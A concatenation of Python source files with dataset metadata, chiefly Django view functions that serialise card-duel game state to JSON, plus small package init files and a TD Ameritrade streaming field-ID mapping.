duelobj, decks, graves, hands, user, other_user, choices, room_number
):
duel = duelobj.duel
if duel.winner != 0 or duel.winner_ai != 0:
return battle_det_return_org(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
return_value = {}
if duelobj.current_log != "":
return_value["current_log"] = escape(duelobj.current_log)
else:
return_value["current_log"] = escape(duel.current_log)
return_value["variable"] = duelobj.get_variables()
return_value["phase"] = duel.phase.id
if duelobj.user == 1:
return_value["turn"] = duel.user_turn
else:
if(duel.user_turn == 1):
return_value["turn"] = 2
else:
return_value["turn"] = 1
return_value["log"] = escape(duel.log_turn)
return_value["message_log"] = escape(duel.message_log)
if duel.ask > 0:
return_value["ask_org"] = True
else:
return_value["ask_org"] = False
if duelobj.user == 1:
if duel.guest_flag is False:
return_value["user_name1"] = escape(duel.user_1.first_name)
else:
return_value["user_name1"] = escape(duel.guest_name)
if duel.is_ai is False:
if duel.guest_flag2 is False:
return_value["user_name2"] = escape(duel.user_2.first_name)
else:
return_value["user_name2"] = escape(duel.guest_name2)
else:
return_value["user_name2"] = "NPC"
else:
if duel.is_ai is False:
if duel.guest_flag2 is False:
return_value["user_name1"] = escape(duel.user_2.first_name)
else:
return_value["user_name1"] = escape(duel.guest_name2)
else:
return_value["user_name1"] = "NPC"
if duel.guest_flag is False:
return_value["user_name2"] = escape(duel.user_1.first_name)
else:
return_value["user_name2"] = escape(duel.guest_name)
if duelobj.user == duel.user_turn:
if duel.ask == 1 or duel.ask == 3:
return_value["ask"] = True
else:
return_value["ask"] = False
else:
if duel.ask == 2 or duel.ask == 3:
return_value["ask"] = True
else:
return_value["ask"] = False
return_value["ask_det"] = duel.ask_det
return_value["user"] = user
return_value["other_user"] = other_user
if duel.appoint == user:
return_value["appoint"] = True
elif duel.appoint == other_user:
return_value["appoint"] = False
deck_info = duelobj.get_deck_info(decks, user, other_user, 1)
return_value["deck_info"] = copy.deepcopy(deck_info)
if duel.appoint == user:
return_value["deck_info"] = duelobj.modify_deck_info(
return_value["deck_info"], duelobj.count_deck(decks), user, other_user, choices[1]
)
return_value["grave_info"] = duelobj.get_grave_info(graves, user, other_user, 1)
if duel.appoint == user:
return_value["grave_info"] = duelobj.modify_grave_info(
return_value["grave_info"], graves.count(), user, other_user, choices[1]
)
hand_info = duelobj.get_hand_info(hands, user, other_user, 1)
return_value["hand_info"] = copy.deepcopy(hand_info)
if duel.appoint == user:
return_value["hand_info"] = duelobj.modify_hand_info(
return_value["hand_info"], hands.count(), user, other_user, choices[1]
)
field = duelobj.field
return_value["field_info"] = copy.deepcopy(field)
if duel.appoint == user:
return_value["field_info"] = duelobj.modify_field_info(
return_value["field_info"], user, other_user, choices[1]
)
else:
return_value["field_info"] = duelobj.modify_field_info(
return_value["field_info"], user, other_user, choices[1]
)
if (
(
(duel.timing is not None and duel.timing.pri is True)
or (duel.timing2 is not None and duel.timing2.pri is True)
or (duel.timing3 is not None and duel.timing3.pri is True))
and duel.appoint == user
and duel.ask == 0
and choices[0] is not None
and duelobj.check_wait(user)
) or (duel.chain > 0 and duel.ask == 0 and duel.appoint == user)\
or (duel.ask == 0 and duel.appoint == user and duel.phase.pri is True):
return_value["pri"] = True
else:
return_value["pri"] = False
return_value["choices"] = choices[0]
if user == 1:
if duel.sound_effect_1 != "":
return_value["sound_effect"] = duel.sound_effect_1
duel.sound_effect_1 = ""
duel.save();
else:
return_value["sound_effect"] = ""
elif user == 2:
if duel.sound_effect_2 != "":
return_value["sound_effect"] = duel.sound_effect_2
duel.sound_effect_2 = ""
duel.save();
else:
return_value["sound_effect"] = ""
return_value["audio"] = duel.audio
config = Config.objects.get()
limit_time = config.limit_time
if duel.mute ==0 :
return_value["koka"] = duelobj.get_koka()
else:
return_value["koka"] = {}
if user == 1:
return_value["time_1"] = limit_time - (time() - duel.time_1)
return_value["time_2"] = limit_time - (time() - duel.time_2)
else:
return_value["time_1"] = limit_time - (time() - duel.time_2)
return_value["time_2"] = limit_time - (time() - duel.time_1)
return_value["winner"] = False
return HttpResponse(json.dumps(return_value))
def battle_det_return_org(
duelobj, decks, graves, hands, user, other_user, choices, room_number
):
if choices is None:
choices = []
choices.append(None)
choices.append(10000)
duel = duelobj.duel
return_value = {}
if duelobj.current_log != "":
return_value["current_log"] = escape(duelobj.current_log)
else:
return_value["current_log"] = escape(duel.current_log)
return_value["variable"] = duelobj.get_variables()
return_value["phase"] = duel.phase.id
return_value["turn"] = duel.user_turn
return_value["log"] = escape(duel.log_turn)
return_value["message_log"] = escape(duel.message_log)
if duel.ask > 0:
return_value["ask_org"] = True
else:
return_value["ask_org"] = False
if duelobj.user == 1:
if duel.guest_flag is False:
return_value["user_name1"] = escape(duel.user_1.first_name)
else:
return_value["user_name1"] = escape(duel.guest_name)
if duel.is_ai == False:
if duel.guest_flag2 is False:
return_value["user_name2"] = escape(duel.user_2.first_name)
else:
return_value["user_name2"] = escape(duel.guest_name2)
else:
if duel.is_ai == False:
if duel.guest_flag2 is False:
return_value["user_name1"] = escape(duel.user_2.first_name)
else:
return_value["user_name1"] = escape(duel.guest_name2)
else:
return_value["user_name1"] = "NPC"
if duel.guest_flag is False:
return_value["user_name2"] = escape(duel.user_1.first_name)
else:
return_value["user_name2"] = escape(duel.guest_name)
return_value["ask_det"] = duel.ask_det
return_value["user"] = user
return_value["other_user"] = other_user
if duel.appoint == user:
return_value["appoint"] = True
elif duel.appoint == other_user:
return_value["appoint"] = False
deck_info = duelobj.get_deck_info(decks, user, other_user, 1)
return_value["deck_info"] = copy.deepcopy(deck_info)
return_value["grave_info"] = duelobj.get_grave_info(graves, user, other_user, 1)
hand_info = duelobj.get_hand_info(hands, user, other_user, 3)
return_value["hand_info"] = copy.deepcopy(hand_info)
field = duelobj.field
return_value["field_info"] = copy.deepcopy(field)
if (
((duel.timing is not None and duel.timing.pri is True)
or (duel.timing2 is not None and duel.timing2.pri is True)
or (duel.timing3 is not None and duel.timing3.pri is True))
and duel.appoint == user
and duel.ask == 0
and choices[0] is not None and duelobj.check_wait(user)
) or (duel.chain > 0 and duel.ask == 0 and duel.appoint == user)\
or (duel.ask == 0 and duel.user_turn != user and duel.appoint == user and duel.phase.pri is True):
return_value["pri"] = True
else:
return_value["pri"] = False
if choices is not None:
if choices[0] == "monster_trigger":
return_value["choices"] = None
else:
return_value["choices"] = choices[0]
else:
return_value["choices"] = None
if user == 1:
if duel.sound_effect_1 != "":
return_value["sound_effect"] = duel.sound_effect_1
duel.sound_effect_1 = ""
duel.save();
else:
return_value["sound_effect"] = ""
elif user == 2:
if duel.sound_effect_2 != "":
return_value["sound_effect"] = duel.sound_effect_2
duel.sound_effect_2 = ""
duel.save();
else:
return_value["sound_effect"] = ""
return_value["audio"] = duel.audio
return_value["koka"] = duelobj.get_koka()
return_value["time_1"] = 0
return_value["time_2"] = 0
return_value["winner"] = True
if duel.winner != 0:
return_value["winner_who"] = duel.winner
else:
return_value["winner_who"] = duel.winner_ai
return HttpResponse(json.dumps(return_value))
def battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
):
duel = duelobj.duel
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
return_value = {}
if duelobj.current_log != "":
return_value["current_log"] = escape(duelobj.current_log)
else:
return_value["current_log"] = escape(duel.current_log)
return_value["variable"] = duelobj.get_variables()
return_value["phase"] = duel.phase.id
return_value["turn"] = duel.user_turn
return_value["log"] = escape(duel.log_turn)
return_value["message_log"] = escape(duel.message_log)
return_value["ask_org"] = False
return_value["ask"] = False
if duelobj.user == 1:
if duel.guest_flag is False:
return_value["user_name1"] = escape(duel.user_1.first_name)
else:
return_value["user_name1"] = escape(duel.guest_name)
return_value["user_name2"] = "NPC"
else:
if duel.is_ai == False:
if duel.guest_flag2 is False:
return_value["user_name1"] = escape(duel.user_2.first_name)
else:
return_value["user_name1"] = escape(duel.guest_name2)
else:
return_value["user_name1"] = "NPC"
if duel.guest_flag is False:
return_value["user_name2"] = escape(duel.user_1.first_name)
else:
return_value["user_name2"] = escape(duel.guest_name)
return_value["ask_det"] = 0
return_value["user"] = user
return_value["other_user"] = other_user
if duel.appoint == user:
return_value["appoint"] = True
elif duel.appoint == other_user:
return_value["appoint"] = False
deck_info = duelobj.get_deck_info(decks, user, other_user, 1)
return_value["deck_info"] = copy.deepcopy(deck_info)
return_value["grave_info"] = duelobj.get_grave_info(graves, user, other_user, 1)
hand_info = duelobj.get_hand_info(hands, user, other_user, 1)
return_value["hand_info"] = copy.deepcopy(hand_info)
field = duelobj.field
return_value["field_info"] = copy.deepcopy(field)
return_value["pri"] = False
return_value["choices"] = None
if user == 1:
if duel.sound_effect_1 != "":
return_value["sound_effect"] = duel.sound_effect_1
duel.sound_effect_1 = ""
else:
return_value["sound_effect"] = ""
elif user == 2:
if duel.sound_effect_2 != "":
return_value["sound_effect"] = duel.sound_effect_2
duel.sound_effect_2 = ""
else:
return_value["sound_effect"] = ""
return_value["audio"] = duel.audio
return_value["koka"] = []
return_value["time_1"] = 0
return_value["time_2"] = 0
return_value["waiting_ai"] = 1
return HttpResponse(json.dumps(return_value))
| 48.169867
| 140
| 0.421729
| 6,090
| 65,222
| 4.326108
| 0.026437
| 0.035072
| 0.035527
| 0.034161
| 0.907576
| 0.875465
| 0.83599
| 0.810825
| 0.7942
| 0.776437
| 0
| 0.021397
| 0.505581
| 65,222
| 1,353
| 141
| 48.205469
| 0.795609
| 0.002346
| 0
| 0.783005
| 0
| 0
| 0.024477
| 0.000651
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003794
| false
| 0.003794
| 0.009105
| 0
| 0.036419
| 0.008346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
451164a71400ced2bc33c7c7685bd00d4a9308e1
| 86
|
py
|
Python
|
wikihow_crawler/__init__.py
|
chinodyt/wikihow_crawler
|
f00fd6c425fe498e8928f7d487a9ce7e1b887e04
|
[
"MIT"
] | null | null | null |
wikihow_crawler/__init__.py
|
chinodyt/wikihow_crawler
|
f00fd6c425fe498e8928f7d487a9ce7e1b887e04
|
[
"MIT"
] | null | null | null |
wikihow_crawler/__init__.py
|
chinodyt/wikihow_crawler
|
f00fd6c425fe498e8928f7d487a9ce7e1b887e04
|
[
"MIT"
] | null | null | null |
from .crawler import Crawler
from .crawler import HowToPage
from .util import Settings
| 28.666667
| 30
| 0.837209
| 12
| 86
| 6
| 0.5
| 0.305556
| 0.472222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127907
| 86
| 3
| 31
| 28.666667
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
18da74fa2fb262d52a01b13b7067323afeaefbf5
| 143
|
py
|
Python
|
dataspace/__init__.py
|
Sam-prog-sudo/dataspace
|
2bab85c4dfa713deb835a46e9214c43a3a674082
|
[
"MIT"
] | 3
|
2021-06-28T09:45:51.000Z
|
2022-01-10T15:38:07.000Z
|
dataspace/__init__.py
|
Sam-prog-sudo/dataspace
|
2bab85c4dfa713deb835a46e9214c43a3a674082
|
[
"MIT"
] | null | null | null |
dataspace/__init__.py
|
Sam-prog-sudo/dataspace
|
2bab85c4dfa713deb835a46e9214c43a3a674082
|
[
"MIT"
] | 1
|
2021-07-01T08:50:32.000Z
|
2021-07-01T08:50:32.000Z
|
from dataspace.core import DataSpace
from dataspace.core.env import is_notebook
from dataspace.core.load import from_df, from_csv, from_django
| 35.75
| 62
| 0.853147
| 23
| 143
| 5.130435
| 0.478261
| 0.330508
| 0.432203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097902
| 143
| 3
| 63
| 47.666667
| 0.914729
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7a07dd15adff197d5e1923e94a5937b2ad4cb538
| 197
|
py
|
Python
|
Controller/communication/__init__.py
|
Ernstsen/RC-car
|
eda8ec6ae28686380c06f442c889ea89a077315b
|
[
"MIT"
] | null | null | null |
Controller/communication/__init__.py
|
Ernstsen/RC-car
|
eda8ec6ae28686380c06f442c889ea89a077315b
|
[
"MIT"
] | 3
|
2021-03-23T15:13:14.000Z
|
2021-03-23T16:15:20.000Z
|
Controller/communication/__init__.py
|
Ernstsen/RC-car
|
eda8ec6ae28686380c06f442c889ea89a077315b
|
[
"MIT"
] | null | null | null |
from .configuration_utilities import Configurator
from .server_utilities import create_server, connect, send, terminate
__all__ = ["Configurator", "create_server", "connect", "send", "terminate"]
| 39.4
| 75
| 0.791878
| 21
| 197
| 7.047619
| 0.52381
| 0.202703
| 0.256757
| 0.310811
| 0.432432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096447
| 197
| 4
| 76
| 49.25
| 0.831461
| 0
| 0
| 0
| 0
| 0
| 0.228426
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e15df7cbb45629311510f0d0339d612d51329356
| 18,649
|
py
|
Python
|
td/fields.py
|
eyesuk/td-ameritrade-python-api
|
0dcdb8029e0fe4e051a56ad276b1d9c5bc62352a
|
[
"MIT"
] | 1
|
2021-10-01T21:16:24.000Z
|
2021-10-01T21:16:24.000Z
|
td/fields.py
|
bkgrover71/sigma_code_td_ameritrade
|
27dfe6515134646049b5ebaa7f7519efa7a93308
|
[
"MIT"
] | null | null | null |
td/fields.py
|
bkgrover71/sigma_code_td_ameritrade
|
27dfe6515134646049b5ebaa7f7519efa7a93308
|
[
"MIT"
] | null | null | null |
ENDPOINT_ARGUMENTS = {
'search_instruments': {
'projection': ['symbol-search', 'symbol-regex', 'desc-search', 'desc-regex', 'fundamental']
},
'get_market_hours': {
'markets': ['EQUITY', 'OPTION', 'FUTURE', 'BOND', 'FOREX']
},
'get_movers': {
'market': ['$DJI', '$COMPX', '$SPX.X'],
'direction': ['up', 'down'],
'change': ['value', 'percent']
},
'get_user_principals': {
'fields': ['streamerSubscriptionKeys', 'streamerConnectionInfo', 'preferences', 'surrogateIds']
}
}
VALID_CHART_VALUES = {
'minute':{
'day':[1, 2, 3, 4, 5, 10]
},
'daily':{
'month':[1, 2, 3, 6],
'year':[1, 2, 3, 5, 10, 15, 20],
'ytd':[1]
},
'weekly':{
'month':[1, 2, 3, 6],
'year':[1, 2, 3, 5, 10, 15, 20],
'ytd':[1]
},
'monthly':{
'year':[1, 2, 3, 5, 10, 15, 20]
}
}
STREAM_FIELD_IDS = {
"account_activity": {
"0": "subscription-key",
"1": "account-id",
"2": "message-type",
"3": "message-data"
},
"level_one_forex": {
"0": "symbol",
"1": "bid-price",
"2": "ask-price",
"3": "last-price",
"4": "bid-size",
"5": "ask-size",
"6": "total-volume",
"7": "last-size",
"8": "quote-time",
"9": "trade-time",
"10": "high-price",
"11": "low-price",
"12": "close-price",
"13": "exchange-id",
"14": "description",
"15": "open-price",
"16": "net-change",
"17": "percent-change",
"18": "exchange-name",
"19": "digits",
"20": "security-status",
"21": "tick",
"22": "tick-amount",
"23": "product",
"24": "trading-hours",
"25": "is-tradable",
"26": "market-maker",
"27": "52-week-high",
"28": "52-week-low",
"29": "mark"
},
"level_one_futures": {
"0": "symbol",
"1": "bid-price",
"2": "ask-price",
"3": "last-price",
"4": "bid-size",
"5": "ask-size",
"6": "ask-id",
"7": "bid-id",
"8": "total-volume",
"9": "last-size",
"10": "quote-time",
"11": "trade-time",
"12": "high-price",
"13": "low-price",
"14": "close-price",
"15": "exchange-id",
"16": "description",
"17": "last-id",
"18": "open-price",
"19": "net-change",
"20": "future-percent-change",
"21": "exhange-name",
"22": "security-status",
"23": "open-interest",
"24": "mark",
"25": "tick",
"26": "tick-amount",
"27": "product",
"28": "future-price-format",
"29": "future-trading-hours",
"30": "future-is-tradable",
"31": "future-multiplier",
"32": "future-is-active",
"33": "future-settlement-price",
"34": "future-active-symbol",
"35": "future-expiration-date"
},
"level_one_futures_options": {
"0": "symbol",
"1": "bid-price",
"2": "ask-price",
"3": "last-price",
"4": "bid-size",
"5": "ask-size",
"6": "ask-id",
"7": "bid-id",
"8": "total-volume",
"9": "last-size",
"10": "quote-time",
"11": "trade-time",
"12": "high-price",
"13": "low-price",
"14": "close-price",
"15": "exchange-id",
"16": "description",
"17": "last-id",
"18": "open-price",
"19": "net-change",
"20": "future-percent-change",
"21": "exhange-name",
"22": "security-status",
"23": "open-interest",
"24": "mark",
"25": "tick",
"26": "tick-amount",
"27": "product",
"28": "future-price-format",
"29": "future-trading-hours",
"30": "future-is-tradable",
"31": "future-multiplier",
"32": "future-is-active",
"33": "future-settlement-price",
"34": "future-active-symbol",
"35": "future-expiration-date"
},
"level_one_option": {
"0": "symbol",
"1": "description",
"2": "bid-price",
"3": "ask-price",
"4": "last-price",
"5": "high-price",
"6": "low-price",
"7": "close-price",
"8": "total-volume",
"9": "open-interest",
"10": "volatility",
"11": "quote-time",
"12": "trade-time",
"13": "money-intrinsic-value",
"14": "quote-day",
"15": "trade-day",
"16": "expiration-year",
"17": "multiplier",
"18": "digits",
"19": "open-price",
"20": "bid-size",
"21": "ask-size",
"22": "last-size",
"23": "net-change",
"24": "strike-price",
"25": "contract-type",
"26": "underlying",
"27": "expiration-month",
"28": "deliverables",
"29": "time-value",
"30": "expiration-day",
"31": "days-to-expiration",
"32": "delta",
"33": "gamma",
"34": "theta",
"35": "vega",
"36": "rho",
"37": "security-status",
"38": "theoretical-option-value",
"39": "underlying-price",
"40": "uv-expiration-type",
"41": "mark"
},
"level_one_quote": {
"0": "symbol",
"1": "bid-price",
"2": "ask-price",
"3": "last-price",
"4": "bid-size",
"5": "ask-size",
"6": "ask-id",
"7": "bid-id",
"8": "total-volume",
"9": "last-size",
"10": "trade-time",
"11": "quote-time",
"12": "high-price",
"13": "low-price",
"14": "bid-tick",
"15": "close-price",
"16": "exchange-id",
"17": "marginable",
"18": "shortable",
"19": "island-bid",
"20": "island-ask",
"21": "island-volume",
"22": "quote-day",
"23": "trade-day",
"24": "volatility",
"25": "description",
"26": "last-id",
"27": "digits",
"28": "open-price",
"29": "net-change",
"30": "52-week-high",
"31": "52-week-low",
"32": "pe-ratio",
"33": "dividend-amount",
"34": "dividend-yield",
"35": "island-bid-size",
"36": "island-ask-size",
"37": "nav",
"38": "fund-price",
"39": "exchange-name",
"40": "dividend-date",
"41": "regular-market-quote",
"42": "regular-market-trade",
"43": "regular-market-last-price",
"44": "regular-market-last-size",
"45": "regular-market-trade-time",
"46": "regular-market-trade-day",
"47": "regular-market-net-change",
"48": "security-status",
"49": "mark",
"50": "quote-time-in-long",
"51": "trade-time-in-long",
"52": "regular-market-trade-time-in-long"
},
"news_headline": {
"0": "symbol",
"1": "error-code",
"2": "story-datetime",
"3": "headline-id",
"4": "status",
"5": "headline",
"6": "story-id",
"7": "count-for-keyword",
"8": "keyword-array",
"9": "is-hot",
"10": "story-source"
},
"qos_request": {
"0": "express",
"1": "real-time",
"2": "fast",
"3": "moderate",
"4": "slow",
"5": "delayed"
},
"timesale": {
"0": "symbol",
"1": "trade-time",
"2": "last-price",
"3": "last-size",
"4": "last-sequence"
},
"chart_equity": {
"seq": "chart-sequence",
"key": "symbol",
"1": "open-price",
"2": "high-price",
"3": "low-price",
"4": "close_price",
"5": "volume",
"6": "sequence",
"7": "chart_time",
"8": "chart_day"
},
"chart_options": {
"seq": "chart-sequence",
"key": "key",
"1": "open-price",
"2": "high-price",
"3": "low-price",
"4": "close_price",
"5": "volume",
"6": "sequence",
"7": "chart_time",
"8": "chart_day"
},
"chart_futures": {
"seq": "chart-sequence",
"key": "key",
"1": "open-price",
"2": "high-price",
"3": "low-price",
"4": "close_price",
"5": "volume",
"6": "sequence",
"7": "chart_time",
"8": "chart_day"
},
"level_two_quotes": {
"0": "key",
"1": "time",
"2": "data"
},
"level_two_nyse": {
"0": "key",
"1": "time",
"2": "data"
},
"level_two_options": {
"0": "key",
"1": "time",
"2": "data"
},
"level_two_forex": {
"0": "key",
"1": "time",
"2": "data"
},
"level_two_nasdaq": {
"0": "key",
"1": "time",
"2": "data"
},
"level_two_futures": {
"0": "key",
"1": "time",
"2": "data"
}
}
CSV_FIELD_KEYS = {
"ACTIVES_NASDAQ":{
"key":"key",
"1":"data"
},
"ACTIVES_OTCBB":{
"key":"key",
"1":"data"
},
"ACTIVES_NYSE":{
"key":"key",
"1":"data"
},
"ACTIVES_OPTIONS":{
"key":"key",
"1":"data"
},
"CHART_EQUITY": {
"seq": "chart-sequence",
"key": "symbol",
"1": "chart-time",
"2": "open-price",
"3": "high-price",
"4": "low-price",
"5": "close-price",
"6": "volume",
"7": "chart-time",
"8": "chart-day"
},
"CHART_FUTURES": {
"seq": "chart-sequence",
"key": "symbol",
"1": "chart-time",
"2": "open-price",
"3": "high-price",
"4": "low-price",
"5": "close-price",
"6": "volume"
},
"CHART_OPTIONS": {
"seq": "chart-sequence",
"key": "symbol",
"1": "chart-time",
"2": "open-price",
"3": "high-price",
"4": "low-price",
"5": "close-price",
"6": "volume"
},
"CHART_HISTORY": {
"seq": "chart-sequence",
"key": "symbol",
"1": "chart-time",
"2": "open-price",
"3": "high-price",
"4": "low-price",
"5": "close-price",
"6": "volume",
"7": "chart-time",
"8": "chart-day"
},
"CHART_HISTORY_FUTURES": {
"seq": "chart-sequence",
"key": "symbol",
"0": "key",
"1": "chart-time",
"2": "open-price",
"3": "high-price",
"4": "low-price",
"5": "close-price",
"6": "volume",
"7": "chart-time",
"8": "chart-day"
},
"LEVELONE_FOREX": {
"1": "bid-price",
"10": "high-price",
"11": "low-price",
"12": "close-price",
"13": "exchange-id",
"14": "description",
"15": "open-price",
"16": "net-change",
"17": "percent-change",
"18": "exchange-name",
"19": "digits",
"2": "ask-price",
"20": "security-status",
"21": "tick",
"22": "tick-amount",
"23": "product",
"24": "trading-hours",
"25": "is-tradable",
"26": "market-maker",
"27": "52-week-high",
"28": "52-week-low",
"29": "mark",
"3": "last-price",
"4": "bid-size",
"5": "ask-size",
"6": "total-volume",
"7": "last-size",
"8": "quote-time",
"9": "trade-time",
"assetMainType": "asset-main-type",
"assetSubType": "asset-sub-type",
"cusip": "cusip",
"delayed": "delayed",
"key": "symbol",
},
"LEVELONE_FUTURES": {
"1": "bid-price",
"10": "quote-time",
"11": "trade-time",
"12": "high-price",
"13": "low-price",
"14": "close-price",
"15": "exchange-id",
"16": "description",
"17": "last-id",
"18": "open-price",
"19": "net-change",
"2": "ask-price",
"20": "future-percent-change",
"21": "exhange-name",
"22": "security-status",
"23": "open-interest",
"24": "mark",
"25": "tick",
"26": "tick-amount",
"27": "product",
"28": "future-price-format",
"29": "future-trading-hours",
"3": "last-price",
"30": "future-is-tradable",
"31": "future-multiplier",
"32": "future-is-active",
"33": "future-settlement-price",
"34": "future-active-symbol",
"35": "future-expiration-date",
"4": "bid-size",
"5": "ask-size",
"6": "ask-id",
"7": "bid-id",
"8": "total-volume",
"9": "last-size",
"assetMainType": "asset-main-type",
"assetSubType": "asset-sub-type",
"cusip": "cusip",
"delayed": "delayed",
"key": "symbol",
},
"LEVELONE_FUTURES_OPTIONS": {
"1": "bid-price",
"10": "quote-time",
"11": "trade-time",
"12": "high-price",
"13": "low-price",
"14": "close-price",
"15": "exchange-id",
"16": "description",
"17": "last-id",
"18": "open-price",
"19": "net-change",
"2": "ask-price",
"20": "future-percent-change",
"21": "exhange-name",
"22": "security-status",
"23": "open-interest",
"24": "mark",
"25": "tick",
"26": "tick-amount",
"27": "product",
"28": "future-price-format",
"29": "future-trading-hours",
"3": "last-price",
"30": "future-is-tradable",
"31": "future-multiplier",
"32": "future-is-active",
"33": "future-settlement-price",
"34": "future-active-symbol",
"35": "future-expiration-date",
"4": "bid-size",
"5": "ask-size",
"6": "ask-id",
"7": "bid-id",
"8": "total-volume",
"9": "last-size",
"assetMainType": "asset-main-type",
"assetSubType": "asset-sub-type",
"cusip": "cusip",
"delayed": "delayed",
"key": "symbol",
},
"OPTION": {
"1": "description",
"10": "volatility",
"11": "quote-time",
"12": "trade-time",
"13": "money-intrinsic-value",
"14": "quote-day",
"15": "trade-day",
"16": "expiration-year",
"17": "multiplier",
"18": "digits",
"19": "open-price",
"2": "bid-price",
"20": "bid-size",
"21": "ask-size",
"22": "last-size",
"23": "net-change",
"24": "strike-price",
"25": "contract-type",
"26": "underlying",
"27": "expiration-month",
"28": "deliverables",
"29": "time-value",
"3": "ask-price",
"30": "expiration-day",
"31": "days-to-expiration",
"32": "delta",
"33": "gamma",
"34": "theta",
"35": "vega",
"36": "rho",
"37": "security-status",
"38": "theoretical-option-value",
"39": "underlying-price",
"4": "last-price",
"40": "uv-expiration-type",
"41": "mark",
"5": "high-price",
"6": "low-price",
"7": "close-price",
"8": "total-volume",
"9": "open-interest",
"assetMainType": "asset-main-type",
"assetSubType": "asset-sub-type",
"cusip": "cusip",
"delayed": "delayed",
"key": "symbol",
},
"QUOTE": {
"10": "trade-time",
"11": "quote-time",
"12": "high-price",
"13": "low-price",
"14": "bid-tick",
"15": "close-price",
"16": "exchange-id",
"17": "marginable",
"18": "shortable",
"1": "bid-price",
"19": "island-bid",
"20": "island-ask",
"21": "island-volume",
"22": "quote-day",
"23": "trade-day",
"24": "volatility",
"25": "description",
"26": "last-id",
"27": "digits",
"28": "open-price",
"2": "ask-price",
"29": "net-change",
"30": "52-week-high",
"31": "52-week-low",
"32": "pe-ratio",
"33": "dividend-amount",
"34": "dividend-yield",
"35": "island-bid-size",
"36": "island-ask-size",
"37": "nav",
"38": "fund-price",
"3": "last-price",
"39": "exchange-name",
"40": "dividend-date",
"41": "regular-market-quote",
"42": "regular-market-trade",
"43": "regular-market-last-price",
"44": "regular-market-last-size",
"45": "regular-market-trade-time",
"46": "regular-market-trade-day",
"47": "regular-market-net-change",
"48": "security-status",
"4": "bid-size",
"49": "mark",
"50": "quote-time-in-long",
"51": "trade-time-in-long",
"5": "ask-size",
"6": "ask-id",
"7": "bid-id",
"8": "total-volume",
"9": "last-size",
"assetMainType": "asset-main-type",
"assetSubType": "asset-sub-type",
"cusip": "cusip",
"delayed": "delayed",
"key": "symbol"
},
"NEWS_HEADLINE": {
"1": "error-code",
"10": "story-source",
"2": "story-datetime",
"3": "headline-id",
"4": "status",
"5": "headline",
"6": "story-id",
"7": "count-for-keyword",
"8": "keyword-array",
"9": "is-hot",
"key": "symbol",
"seq": "sequence"
},
"TIMESALE_EQUITY": {
"1": "trade-time",
"2": "last-price",
"3": "last-size",
"4": "last-sequence",
"key": "symbol",
"seq": "sequence"
},
"TIMESALE_FUTURES": {
"1": "trade-time",
"2": "last-price",
"3": "last-size",
"4": "last-sequence",
"key": "symbol",
"seq": "sequence"
},
"TIMESALE_FOREX": {
"1": "trade-time",
"2": "last-price",
"3": "last-size",
"4": "last-sequence",
"key": "symbol",
"seq": "sequence"
},
"TIMESALE_OPTIONS": {
"1": "trade-time",
"2": "last-price",
"3": "last-size",
"4": "last-sequence",
"key": "symbol",
"seq": "sequence"
},
}
CSV_FIELD_KEYS_LEVEL_2 = {
"NASDAQ_BOOK": "nested",
"OPTIONS_BOOK": "nested",
"LISTED_BOOK": "nested",
"FUTURES_BOOK":"nested"
}
| 26.565527
| 103
| 0.414928
| 1,887
| 18,649
| 4.059353
| 0.118177
| 0.023499
| 0.013055
| 0.009399
| 0.864621
| 0.853916
| 0.846084
| 0.839164
| 0.816841
| 0.816841
| 0
| 0.072497
| 0.347633
| 18,649
| 701
| 104
| 26.603424
| 0.557126
| 0
| 0
| 0.811782
| 0
| 0
| 0.435895
| 0.040163
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e15eda961a80cdf29e378c09b40005c5e137cf78
| 8,815
|
py
|
Python
|
problems/ranking/variational.py
|
VivienCabannes/infimum_loss
|
f3fa6dbdf73431105d1097712dae0d23ec0ca37d
|
[
"MIT"
] | 10
|
2020-12-22T21:30:06.000Z
|
2021-09-10T09:07:13.000Z
|
problems/ranking/variational.py
|
VivienCabannes/infimum_loss
